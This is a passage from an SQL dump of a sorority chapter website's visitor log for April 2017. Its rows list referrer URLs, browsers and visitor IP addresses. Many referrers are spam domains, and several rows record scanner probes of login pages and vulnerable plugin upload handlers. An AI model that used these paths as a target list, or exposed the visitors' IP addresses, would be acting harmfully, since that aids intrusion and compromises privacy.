lgz.org','Chrome','Linux','49.0.2629.69','','118.163.51.166','000',1,0),(3087,'2017-04-12','http://zphiblgz.org','MSIE','Windows','8.0','','118.163.51.166','000',1,0),(3088,'2017-04-12','http://zphiblgz.org','Firefox','Windows','48.0','','118.163.51.166','000',1,0),(3089,'2017-04-12','http://zphiblgz.org','Chrome','Macintosh','52.0.2781.70','','118.163.51.166','000',1,0),(3090,'2017-04-12','http://zphiblgz.org','Chrome','Linux','51.0.2719.2','','118.163.51.166','000',1,0),(3091,'2017-04-12','http://zphiblgz.org','Chrome','Macintosh','52.0.2761.1','','118.163.51.166','000',1,0),(3092,'2017-04-12','http://zphiblgz.org','Chrome','Macintosh','54.0.2847.65','','118.163.51.166','000',1,0),(3093,'2017-04-12','http://zphiblgz.org','Chrome','Windows','53.0.2834.11','','118.163.51.166','000',1,0),(3094,'2017-04-12','http://zphiblgz.org','Chrome','Linux','53.0.2835.4','','118.163.51.166','000',1,0),(3095,'2017-04-12','http://zphiblgz.org','Firefox','Windows','47.0','','118.163.51.166','000',1,0),(3096,'2017-04-12','http://zphiblgz.org','Chrome','Macintosh','49.0.2645.57','','118.163.51.166','000',1,0),(3097,'2017-04-12','https://www.google.com/','Chrome','Macintosh','57.0.2987.133','','174.99.74.12','000',1,0),(3098,'2017-04-12','http://zona-aqua.ru/','MSIE','Windows','6.0','','37.229.253.129','000',4,0),(3099,'2017-04-12','http://zphibiotasigmazeta.org/','Chrome','Windows','56.0.2924.87','','62.212.68.156','000',1,0),(3100,'2017-04-12','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(3101,'2017-04-12','http://zphiblgz.org','Firefox','Windows','40.1','','83.223.172.114','000',1,0),(3102,'2017-04-12','http://zphiblgz.org/programs/','Chrome','Windows','57.0.2987.133','','71.121.204.212','000',1,0),(3103,'2017-04-12','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','50.164.59.70','000',5,0),(3104,'2017-04-12','http://zphiblgz.org','Firefox','Windows','40.1','','93.103.67.66','000',2,0),(3105,'2017-04-12','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.52.168','000',2,0),(3106,'2017-04-12','http://zphiblgz.org/event/ms-walk-2017/','Chrome','Windows','48.0.2564.97','','193.201.225.139','000',22,0),(3107,'2017-04-12','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','104.205.166.85','000',1,0),(3108,'2017-04-12','http://zphiblgz.org','Firefox','Windows','40.1','','27.54.164.98','000',2,0),(3109,'2017-04-13','http://hotloans.ru/','Opera','Windows','7.54','','46.118.115.123','000',3,0),(3110,'2017-04-13','http://zphiblgz.org','Firefox','Windows','40.1','','112.204.172.184','000',2,0),(3111,'2017-04-13','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.13','000',1,0),(3112,'2017-04-13','https://www.google.com/','Chrome','Android','57.0.2987.132','','97.123.54.210','000',1,0),(3113,'2017-04-13','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','46.105.31.30','000',1,0),(3114,'2017-04-13','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(3115,'2017-04-13','http://rybalka-opt.ru/','Opera','Windows','9.0','','46.119.118.191','000',2,0),(3116,'2017-04-13','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','75.190.65.166','000',1,0),(3117,'2017-04-13','http://xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai/','MSIE','Windows','6.0','','46.118.126.252','000',4,0),(3118,'2017-04-13','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.244.98','000',1,0),(3119,'2017-04-13','http://wheelchairliftsarea.com/','Opera','Windows','9.01','','46.118.115.123','000',1,0),(3120,'2017-04-13','http://portomaltese.net/aviaradar/','MSIE','Windows','6.0','','46.118.115.123','000',3,0),(3121,'2017-04-13','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3122,'2017-04-13','http://zphiblgz.org','Firefox','Windows','40.1','','117.205.241.220','000',1,0),(3123,'2017-04-13','http://bolitgorlo.net/zabolevaniya/drugie/izzhoga-v-gorle.html','MSIE','Windows','6.0','','46.119.118.191','000',2,0),(3124,'2017-04-13','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1390.LE4e-nDVjP2x-oQgSlIGb0rDK0dTRhQHKA7EoyE6rRRggkitPOV2B5ENtIPFprRa.d920bf824bdbccf49911f7e1ebb3d928785ca561&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSTl4bExRX25CZ2tXdWxYN3ZBUng4bHZzNjZKaW5nYUNRZGtSRlJnbzh2Q2dkSndnMmg0Y1A1cHJXVkJBakgxcTNXS2lVS3JIa0NyaHNfb2VLYU5QT3A0VWVVeUFZa0xfdw&b64e=2&sign=8db43678398b5626670ec549020df940&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrwX1QBlgH-siRcQCnq8eWAxAYkx-fAj0dcyPh5Jer6zeten83M-wTIvk-8qD0gAFulk1r_ilPSlUzMFA6WiRAemnnyfXexBwf0-sc4gVTyPZrWDGN2B58zeIC5d3-DOBh&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEF9FzCnzBXC_RIzJ7PcMMtt6XQU8A7QRvc1urKvsajUEuxC3XWt_M1X3JvGpIDR04A&l10n=ru&cts=1492105223412&mc=5.96298895336','Chrome','Windows','31.0.1650.57','','46.147.213.173','000',1,0),(3125,'2017-04-13','http://zphiblgz.org/','MSIE','Windows','11.0','','52.213.119.161','000',3,0),(3126,'2017-04-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(3127,'2017-04-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3128,'2017-04-13','http://zphiblgz.org','MSIE','Windows','11.0','','192.198.80.227','000',1,0),(3129,'2017-04-13','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','69.195.247.116','000',2,0),(3130,'2017-04-13','http://mnogabukaff.net/','MSIE','Windows','5.5','','46.119.118.191','000',1,0),(3131,'2017-04-13','http://vipms.ru/','MSIE','Unknown','6.0','','46.118.126.252','000',2,0),(3132,'2017-04-13','http://zontcpa.com//wp-green.php','Opera','Windows','9.51','','178.217.187.39','000',2,0),(3133,'2017-04-13','http://zphiblgz.org','Firefox','Windows','40.1','','182.179.156.99','000',2,0),(3134,'2017-04-13','http://zphiblgz.org','Chrome','Windows','44.0.2403.130','','91.225.166.143','000',1,0),(3135,'2017-04-13','https://www.aquarium-pro.ru/','MSIE','Windows','6.0','','46.119.112.125','000',4,0),(3136,'2017-04-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.36.43.209','000',1,0),(3137,'2017-04-13','http://zphiblgz.org','Chrome','Linux','54.0.2840.100','','104.144.88.254','000',1,0),(3138,'2017-04-13','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','34.194.154.145','000',1,0),(3139,'2017-04-13','https://www.google.com/','Chrome','Windows','57.0.2987.133','','24.129.253.18','000',2,0),(3140,'2017-04-13','http://zphiblgz.org/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(3141,'2017-04-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','175.42.45.207','000',10,0),(3142,'2017-04-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','175.42.45.207','000',21,0),(3143,'2017-04-14','http://zphiblgz.org','MSIE','Windows','11.0','','192.198.80.227','000',1,0),(3144,'2017-04-14','http://prohoster.info','MSIE','Windows','7.0b','','46.119.118.191','000',2,0),(3145,'2017-04-14','http://nagdak.ru/','Opera','Windows','8.00','','37.229.253.129','000',3,0),(3146,'2017-04-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.33.75.106','000',7,0),(3147,'2017-04-14','http://dvervmoskvu.ru/','Unknown','Unknown','Unknown','','46.119.112.125','000',3,0),(3148,'2017-04-14','http://zphiblgz.org','Safari','Macintosh','5.1.8','','136.243.17.161','000',1,0),(3149,'2017-04-14','http://mega-polis.biz.ua/','Opera','Windows','9.0','','46.118.115.123','000',2,0),(3150,'2017-04-14','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','166.137.240.130','000',2,0),(3151,'2017-04-14','http://zphiblgz.org','Firefox','Windows','40.1','','81.16.8.105','000',1,0),(3152,'2017-04-14','http://www.avtolombard-krasnodar.com/','MSIE','Windows','6.0','','46.118.126.252','000',3,0),(3153,'2017-04-14','https://www.google.com/','Chrome','Windows','57.0.2987.98','','167.102.229.10','000',1,0),(3154,'2017-04-14','http://zphiblgz.org','Chrome','Windows','39.0.2171.99','','192.198.80.227','000',2,0),(3155,'2017-04-14','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(3156,'2017-04-14','https://2dm.prohoster.info/domain-registration/index.php','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3157,'2017-04-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(3158,'2017-04-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(3159,'2017-04-14','http://zphiblgz.org','Firefox','Windows','40.1','','27.147.242.141','000',2,0),(3160,'2017-04-14','http://kinoplen.ru/','MSIE','Unknown','6.0','','46.119.112.125','000',1,0),(3161,'2017-04-14','http://hotloans.ru/','MSIE','Windows','6.0','','46.118.115.123','000',1,0),(3162,'2017-04-14','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','5.2.69.166','000',1,0),(3163,'2017-04-14','http://zphiblgz.org/','Opera','Windows','12.17','','5.2.69.166','000',2,0),(3164,'2017-04-14','http://zphiblgz.org/','Chrome','Windows','46.0.2490.86','','185.26.112.163','000',2,0),(3165,'2017-04-14','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','10.1','','108.69.16.73','000',3,0),(3166,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.208.62.241','000',7,0),(3167,'2017-04-15','https://akita.kz/','Unknown','Unknown','Unknown','','46.119.118.191','000',3,0),(3168,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.209.132.132','000',7,0),(3169,'2017-04-15','http://produkto.net/','MSIE','Windows','5.5','','46.118.115.123','000',2,0),(3170,'2017-04-15','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','51.15.53.134','000',1,0),(3171,'2017-04-15','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.115','000',1,0),(3172,'2017-04-15','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.125.143','000',1,0),(3173,'2017-04-15','http://zphiblgz.org','Firefox','Windows','40.1','','89.111.241.5','000',2,0),(3174,'2017-04-15','https://www.google.com/','Firefox','Macintosh','49.0','','174.204.13.254','000',1,0),(3175,'2017-04-15','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','174.200.4.2','000',5,0),(3176,'2017-04-15','http://ed-shop01.ru/','Unknown','Unknown','Unknown','','46.119.112.125','000',1,0),(3177,'2017-04-15','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(3178,'2017-04-15','http://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(3179,'2017-04-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.69','000',1,0),(3180,'2017-04-15','http://zphiblgz.org','Chrome','Windows','26.0.1410.43','','5.9.17.118','000',1,0),(3181,'2017-04-15','https://www.google.com/','Safari','iPhone','10.0','','69.251.111.201','000',3,0),(3182,'2017-04-15','http://prohoster.info/vps/ssd-vps','Opera','Windows','9.00','','46.119.118.191','000',3,0),(3183,'2017-04-15','http://ivanstroi.ru/','MSIE','Windows','6.0','','46.119.118.191','000',3,0),(3184,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.73.181.144','000',1,0),(3185,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.161.79.141','000',1,0),(3186,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.119.182.214','000',1,0),(3187,'2017-04-15','http://zphiblgz.org','Chrome','Linux','57.0.2987.133','','108.48.105.40','000',3,0),(3188,'2017-04-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(3189,'2017-04-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(3190,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.147.13','000',1,0),(3191,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','176.58.89.75','000',1,0),(3192,'2017-04-15','https://www.google.com/','Safari','iPhone','10.0','','100.36.69.101','000',1,0),(3193,'2017-04-15','http://iopeninghours.co.uk/','MSIE','Windows','6.0','','46.119.112.125','000',2,0),(3194,'2017-04-15','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','105.158.132.52','000',8,0),(3195,'2017-04-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','105.158.132.52','000',1,0),(3196,'2017-04-15','http://krasivoe-hd.net/','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3197,'2017-04-15','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.129.194.127','000',4,0),(3198,'2017-04-15','http://whiteelephantwellington.com/','MSIE','Windows','5.5','','46.118.126.252','000',1,0),(3199,'2017-04-15','http://zphiblgz.org/wp-login.php','Firefox','Windows','50.0','','112.175.50.225','000',1,0),(3200,'2017-04-15','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','138.68.100.27','000',3,0),(3201,'2017-04-15','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',1,0),(3202,'2017-04-15','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','185.7.214.173','000',10,0),(3203,'2017-04-15','http://zphiblgz.org/wp-login.php','Firefox','Windows','50.0','','94.73.144.150','000',2,0),(3204,'2017-04-15','https://digital-sale.su/','MSIE','Windows','6.0','','46.118.126.252','000',2,0),(3205,'2017-04-15','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','75.190.65.166','000',5,0),(3206,'2017-04-15','http://zphiblgz.org','Firefox','Windows','40.1','','82.202.99.1','000',1,0),(3207,'2017-04-15','http://vektorpress.ru/','Opera','Windows','8.50','','46.119.112.125','000',1,0),(3208,'2017-04-15','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','112.78.2.10','000',4,0),(3209,'2017-04-15','http://zphiblgz.org/scholarship/','Safari','iPhone','10.0','','71.244.130.117','000',1,0),(3210,'2017-04-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','207.190.104.244','000',1,0),(3211,'2017-04-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','1.220.194.173','000',1,0),(3212,'2017-04-16','https://woweb.com.ua/','MSIE','Windows','5.5','','46.118.115.123','000',1,0),(3213,'2017-04-16','http://zphiblgz.org','Firefox','Linux','4.0b9pre','','106.120.151.77','000',3,0),(3214,'2017-04-16','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',2,0),(3215,'2017-04-16','http://doctormakarova.ru/','Opera','Windows','7.02','','46.118.126.252','000',4,0),(3216,'2017-04-16','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','26.0.1410.64','','5.61.32.26','000',1,0),(3217,'2017-04-16','http://zphiblgz.org/wp-admin/','Safari','iPad','5.1','','5.61.32.26','000',1,0),(3218,'2017-04-16','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.196','000',1,0),(3219,'2017-04-16','http://zphiblgz.org','Firefox','Windows','40.1','','117.203.4.185','000',1,0),(3220,'2017-04-16','http://avon-ukraine.com/','MSIE','Windows','6.0','','46.118.115.123','000',2,0),(3221,'2017-04-16','http://zphiblgz.org','Chrome','Android','44.0.2403.133','','174.204.20.183','000',1,0),(3222,'2017-04-16','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','198.204.244.34','000',1,0),(3223,'2017-04-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(3224,'2017-04-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(3225,'2017-04-16','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(3226,'2017-04-16','http://zphiblgz.org/wp-login.php','Firefox','Windows','50.0','','119.205.197.105','000',1,0),(3227,'2017-04-16','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.144','000',1,0),(3228,'2017-04-16','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','37.229.253.129','000',2,0),(3229,'2017-04-17','http://xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai/','MSIE','Windows','6.0','','46.119.112.125','000',8,0),(3230,'2017-04-17','http://mnogabukaff.net/','Opera','Windows','6.0','','46.119.118.191','000',3,0),(3231,'2017-04-17','http://rybalka-opt.ru/','MSIE','Windows','6.0','','46.119.118.191','000',5,0),(3232,'2017-04-17','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',1,0),(3233,'2017-04-17','http://xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai/','MSIE','Windows','6.0','','46.118.126.252','000',3,0),(3234,'2017-04-17','android-app://com.google.android.googlequicksearchbox','Chrome','Android','57.0.2987.132','','59.25.203.92','000',1,0),(3235,'2017-04-17','http://zphiblgz.org','Firefox','Linux','50.0','','149.202.72.198','000',1,0),(3236,'2017-04-17','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(3237,'2017-04-17','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','204.126.132.241','000',2,0),(3238,'2017-04-17','http://zphiblgz.org','Firefox','Windows','40.1','','49.35.22.212','000',2,0),(3239,'2017-04-17','http://zphiblgz.org/wp-login.php','Firefox','Windows','50.0','','112.162.184.41','000',1,0),(3240,'2017-04-17','http://zphiblgz.org','Firefox','Windows','50.0','','78.62.106.127','000',1,0),(3241,'2017-04-17','http://pizza-imperia.com/','Chrome','Linux','37.0.2062.120','','79.124.59.194','000',1,0),(3242,'2017-04-17','https://www.aquarium-pro.ru/','Opera','Windows','7.54','','46.119.112.125','000',2,0),(3243,'2017-04-17','http://remontbiz.ru/','MSIE','Windows','6.0','','46.118.115.123','000',4,0),(3244,'2017-04-17','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(3245,'2017-04-17','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3246,'2017-04-17','http://zphiblgz.org','Firefox','Windows','40.1','','188.75.128.27','000',1,0),(3247,'2017-04-17','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.22','000',3,0),(3248,'2017-04-17','http://zphiblgz.org','Chrome','Linux','33.0.1771.96','','83.217.27.128','000',1,0),(3249,'2017-04-17','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(3250,'2017-04-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(3251,'2017-04-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3252,'2017-04-17','http://www.google.com/','Chrome','Android','57.0.2987.132','','73.173.91.7','000',15,0),(3253,'2017-04-17','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','9.0.2','','73.173.220.133','000',5,0),(3254,'2017-04-17','http://zphiblgz.org','Firefox','Windows','34.0','','89.232.69.24','000',4,0),(3255,'2017-04-17','http://zphiblgz.org','Chrome','Windows','29.0.1547.76','','31.131.21.175','000',1,0),(3256,'2017-04-17','http://zphiblgz.org','AppleWebKit','iPhone','602.4.6','','66.87.80.195','000',5,0),(3257,'2017-04-17','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','91.121.141.219','000',4,0),(3258,'2017-04-17','http://zphiblgz.org/','Firefox','Windows','35.0','','138.68.100.121','000',4,0),(3259,'2017-04-17','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.95.164.187','000',1,0),(3260,'2017-04-17','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','69.251.111.201','000',5,0),(3261,'2017-04-17','https://www.bing.com/','Edge','Windows','14.14393','','68.134.4.67','000',3,0),(3262,'2017-04-17','http://zphiblgz.org','Firefox','Windows','40.1','','99.67.160.33','000',1,0),(3263,'2017-04-17','https://www.google.com/','Safari','iPhone','10.0','','72.81.227.12','000',9,0),(3264,'2017-04-17','http://prohoster.info/server/dts-prohoster','Opera','Windows','8.01','','37.229.253.129','000',3,0),(3265,'2017-04-17','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','71.121.204.212','000',3,0),(3266,'2017-04-17','http://zphiblgz.org','Safari','Linux','538.1','','34.205.81.230','000',1,0),(3267,'2017-04-17','http://zphiblgz.org','Firefox','Windows','34.0','','93.94.234.110','000',2,0),(3268,'2017-04-18','http://www.google.com/','Chrome','Android','57.0.2987.132','','73.173.91.7','000',4,0),(3269,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','188.123.230.206','000',2,0),(3270,'2017-04-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.59','000',1,0),(3271,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','178.207.249.50','000',2,0),(3272,'2017-04-18','http://mega-polis.biz.ua/','MSIE','Windows','6.0','','46.118.115.123','000',2,0),(3273,'2017-04-18','http://zphiblgz.org','Firefox','Windows','40.1','','202.51.76.42','000',2,0),(3274,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','87.117.12.59','000',2,0),(3275,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','217.150.50.69','000',2,0),(3276,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','46.180.119.120','000',2,0),(3277,'2017-04-18','http://sankt-peterburg.nodup.ru/','Opera','Windows','9.0','','46.118.115.123','000',2,0),(3278,'2017-04-18','http://www.zphibmaryland.org/chapters/','Chrome','Windows','57.0.2987.133','','155.19.91.37','000',4,0),(3279,'2017-04-18','http://www.zphibmaryland.org/chapters/','Chrome','Windows','57.0.2987.133','','96.88.239.1','000',16,0),(3280,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','46.236.129.182','000',2,0),(3281,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','46.73.21.52','000',2,0),(3282,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','213.87.123.187','000',2,0),(3283,'2017-04-18','https://ascat.porn/','Opera','Windows','8.01','','46.119.118.191','000',3,0),(3284,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','159.224.11.242','000',2,0),(3285,'2017-04-18','http://zphiblgz.org','Firefox','Windows','40.1','','177.68.156.93','000',1,0),(3286,'2017-04-18','http://zphiblgz.org','oodlebot','Unknown','1.0','','64.13.155.21','000',1,0),(3287,'2017-04-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(3288,'2017-04-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(3289,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','95.73.112.47','000',2,0),(3290,'2017-04-18','https://www.google.com','Firefox','Windows','45.0','','8.44.100.11','000',1,0),(3291,'2017-04-18','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','204.126.132.241','000',5,0),(3292,'2017-04-18','http://vipms.ru/','MSIE','Windows','5.0','','46.118.126.252','000',6,0),(3293,'2017-04-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.54','000',1,0),(3294,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','77.82.40.35','000',2,0),(3295,'2017-04-18','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.129.194.127','000',1,0),(3296,'2017-04-18','http://zphiblgz.org','Firefox','Windows','40.1','','98.206.197.197','000',1,0),(3297,'2017-04-18','http://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/','MSIE','Windows','5.5','','37.229.253.129','000',3,0),(3298,'2017-04-18','http://r.search.yahoo.com/_ylt=A0LEVvvWq_ZYHCUAtG8nnIlQ;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1492589655/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=yTWgr5cEWVRDsvNifWsXC9pFvTI-','Firefox','Windows','52.0','','104.56.184.113','000',2,0),(3299,'2017-04-18','http://zphiblgz.org','Firefox','Windows','40.1','','105.158.218.112','000',1,0),(3300,'2017-04-18','http://zphiblgz.org','MSIE','Windows','9.0','','70.39.157.193','000',1,0),(3301,'2017-04-18','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','75.64.141.19','000',1,0),(3302,'2017-04-18','http://zphiblgz.org','Firefox','Windows','40.1','','189.160.231.127','000',1,0),(3303,'2017-04-18','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','75.190.65.166','000',1,0),(3304,'2017-04-18','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3305,'2017-04-18','http://zphiblgz.org','Firefox','Windows','34.0','','37.151.130.74','000',2,0),(3306,'2017-04-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.30.66','000',1,0),(3307,'2017-04-19','http://zphiblgz.org','Firefox','Windows','34.0','','91.189.85.173','000',2,0),(3308,'2017-04-19','http://zphiblgz.org','Firefox','Windows','40.1','','86.201.55.9','000',2,0),(3309,'2017-04-19','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.191.189.114','000',2,0),(3310,'2017-04-19','http://zphiblgz.org','Firefox','Windows','34.0','','94.25.176.37','000',2,0),(3311,'2017-04-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','177.70.106.25','000',2,0),(3312,'2017-04-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','69.167.160.101','000',2,0),(3313,'2017-04-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.5.6.136','000',2,0),(3314,'2017-04-19','http://zphiblgz.org','Firefox','Windows','34.0','','188.187.180.3','000',2,0),(3315,'2017-04-19','http://rybalka-opt.ru/','MSIE','Windows','6.0','','46.119.118.191','000',1,0),(3316,'2017-04-19','http://zphiblgz.org','Firefox','Windows','40.1','','41.230.201.18','000',2,0),(3317,'2017-04-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.191.189.114','000',1,0),(3318,'2017-04-19','http://zphiblgz.org','MSIE','Windows','9.0','','213.254.241.6','000',2,0),(3319,'2017-04-19','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','104.254.244.80','000',12,0),(3320,'2017-04-19','http://zphiblgz.org','MSIE','Windows','11.0','','104.129.194.71','000',1,0),(3321,'2017-04-19','http://zphiblgz.org/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(3322,'2017-04-19','http://remontbiz.ru/','Unknown','Unknown','Unknown','','46.118.115.123','000',6,0),(3323,'2017-04-19','http://picturesmania.com/','MSIE','Windows','6.0','','46.119.112.125','000',4,0),(3324,'2017-04-19','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','174.193.131.253','000',1,0),(3325,'2017-04-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(3326,'2017-04-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(3327,'2017-04-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','203.45.244.248','000',2,0),(3328,'2017-04-19','http://www.avtolombard-krasnodar.com/','Opera','Windows','6.01','','46.118.126.252','000',6,0),(3329,'2017-04-19','http://zphiblgz.org','Firefox','Windows','34.0','','62.183.85.155','000',2,0),(3330,'2017-04-19','http://zphiblgz.org','Firefox','Windows','40.1','','189.3.224.234','000',1,0),(3331,'2017-04-19','http://zphiblgz.org','Firefox','Windows','40.1','','14.139.161.139','000',2,0),(3332,'2017-04-19','http://zphiblgz.org','Firefox','Windows','34.0','','178.70.50.208','000',2,0),(3333,'2017-04-19','http://zphiblgz.org','Firefox','Windows','19.0','','192.195.80.10','000',10,0),(3334,'2017-04-19','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=22&ved=0ahUKEwjN4aK8u7HTAhUD52MKHUJ_DKM4ChAWCHcwCw&url=http%3A%2F%2Fzphiblgz.org%2Fprograms%2F&usg=AFQjCNECQhP2O76-B_EHGciyIOEw4nqV9Q','MSIE','Windows','11.0','','129.109.12.139','000',10,0),(3335,'2017-04-19','http://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(3336,'2017-04-19','http://m.baidu.com/s?wd=Home-ZetaPhiBetaSororityInc.%